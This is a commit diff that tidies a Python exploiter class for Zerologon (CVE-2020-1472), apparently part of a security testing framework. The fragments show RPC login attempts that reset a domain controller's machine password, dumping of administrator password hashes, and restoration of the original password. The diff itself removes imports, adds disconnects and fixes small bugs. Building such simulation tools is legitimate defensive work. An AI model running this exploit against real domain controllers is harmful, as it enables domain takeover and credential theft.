Testing changes
This commit is contained in:
parent
2c2a9eaaae
commit
0866aee2cf
|
@ -3,15 +3,13 @@ Zerologon, CVE-2020-1472
|
||||||
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import io
|
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
import sys
|
|
||||||
from binascii import unhexlify
|
from binascii import unhexlify
|
||||||
from typing import List, Optional
|
from typing import List, Optional
|
||||||
|
|
||||||
import impacket
|
import impacket
|
||||||
from impacket.dcerpc.v5 import epm, nrpc, transport
|
from impacket.dcerpc.v5 import nrpc
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
@ -57,6 +55,8 @@ class ZerologonExploiter(HostExploiter):
|
||||||
LOG.debug("Attempting exploit.")
|
LOG.debug("Attempting exploit.")
|
||||||
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
|
_exploited = self._send_exploit_rpc_login_requests(rpc_con)
|
||||||
|
|
||||||
|
rpc_con.disconnect()
|
||||||
|
|
||||||
else:
|
else:
|
||||||
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
|
||||||
_exploited = False
|
_exploited = False
|
||||||
|
@ -73,12 +73,13 @@ class ZerologonExploiter(HostExploiter):
|
||||||
return _exploited
|
return _exploited
|
||||||
|
|
||||||
def is_exploitable(self) -> bool:
|
def is_exploitable(self) -> bool:
|
||||||
if self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']:
|
if self.zerologon_finger._SCANNED_SERVICE in self.host.services:
|
||||||
return True
|
return self.host.services[self.zerologon_finger._SCANNED_SERVICE]['is_vulnerable']
|
||||||
return self.zerologon_finger.get_host_fingerprint(self.host)
|
return self.zerologon_finger.get_host_fingerprint(self.host)
|
||||||
|
|
||||||
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
|
def _send_exploit_rpc_login_requests(self, rpc_con) -> Optional[bool]:
|
||||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||||
|
result_exploit_attempt = None
|
||||||
for _ in range(0, self.MAX_ATTEMPTS):
|
for _ in range(0, self.MAX_ATTEMPTS):
|
||||||
try:
|
try:
|
||||||
result_exploit_attempt = self.attempt_exploit(rpc_con)
|
result_exploit_attempt = self.attempt_exploit(rpc_con)
|
||||||
|
@ -154,6 +155,10 @@ class ZerologonExploiter(HostExploiter):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.error(e)
|
LOG.error(e)
|
||||||
|
|
||||||
|
finally:
|
||||||
|
if rpc_con:
|
||||||
|
rpc_con.disconnect()
|
||||||
|
|
||||||
def get_admin_pwd_hashes(self) -> str:
|
def get_admin_pwd_hashes(self) -> str:
|
||||||
try:
|
try:
|
||||||
options = OptionsForSecretsdump(
|
options = OptionsForSecretsdump(
|
||||||
|
@ -295,8 +300,9 @@ class ZerologonExploiter(HostExploiter):
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
|
LOG.info(f"Exception occurred while removing file {path} from system: {str(e)}")
|
||||||
|
|
||||||
def _send_restoration_rpc_login_requests(Self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
def _send_restoration_rpc_login_requests(self, rpc_con, original_pwd_nthash) -> Optional[bool]:
|
||||||
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
# Max attempts = 2000. Expected average number of attempts needed: 256.
|
||||||
|
result_restoration_attempt = None
|
||||||
for _ in range(0, self.MAX_ATTEMPTS):
|
for _ in range(0, self.MAX_ATTEMPTS):
|
||||||
try:
|
try:
|
||||||
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
|
result_restoration_attempt = self.attempt_restoration(rpc_con, original_pwd_nthash)
|
||||||
|
|
|
@ -1,7 +1,5 @@
|
||||||
import io
|
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
import sys
|
|
||||||
import traceback
|
import traceback
|
||||||
|
|
||||||
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
from impacket.examples.secretsdump import (LocalOperations, LSASecrets,
|
||||||
|
|
Loading…
Reference in New Issue